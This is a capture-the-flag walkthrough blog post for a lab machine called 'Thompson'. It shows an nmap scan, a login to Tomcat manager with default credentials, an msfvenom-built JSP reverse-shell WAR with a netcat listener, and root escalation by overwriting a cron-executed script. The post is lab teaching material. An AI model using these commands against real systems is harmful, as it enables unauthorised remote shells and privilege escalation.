Thompson
Introduction
Hi Techies,
In this topic we are going to experience a new topic of boot2boot machine.
Let’s get started
Deploy
As known the first step is to deploy the machine
Connect with VPN & check connectivity
Reconnaissance
We will check for the open ports of the vulnerable machine
#nmap -sS -sV -O 10.10.142.92
We got three open ports.
Since, port 8080/http is open, we will check in web server
We have opened the web server using the 8080 port, we got some information about tomcat
After going through entire tomcat we can see, there are 3 buttons.We will check it
We will click on the server status button
Once the button is clicked, a dialog box is prompted, which is asking for the credentials.
As we are not sure of the credentials, click on the cancel button, it directs to the page, which has the credentials of tomcat ,manager
Username :- tomcat
Password :- s3cret
We will login to the tomcat manager application with the credentials we found
It is directing us to another page
It tells us, we can deploy the machine using WAR file
As searched over the internet, it shows a payload for WAR file
we will create a war file
#msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.11.235 LPORT=1234 -f war > shell.war
Since, we created war file. We will upload it in the web server
- user.txt
After deploying the war file, we got the shell in the browser
Open a listening port
#nc -lvnp 1234
open the /shell
login to home dir
Inside the home directory, we got the jack user & the user flag
In jack user, we have another two files “test.txt” & “id.sh”. We will find the contents of the file.
We found “test.txt” is an root.
2. root.txt
Usually id.sh file is executed by the root users, but it is responded to test.txt file as well.
So, we will check inside the crontab.
Since, id.sh will be executed by root user, we will overwrite id.sh by fetching root.txt from the root user
#echo “cp root/root.txt /home/jack/root.txt”> id.sh
It gives us the information of root flag
We found the flags
Completed the box
I hope this blog is quite interesting of learning new topics and helps you to gain knowledge about boot2boot machine concept.
Happy learning!!!
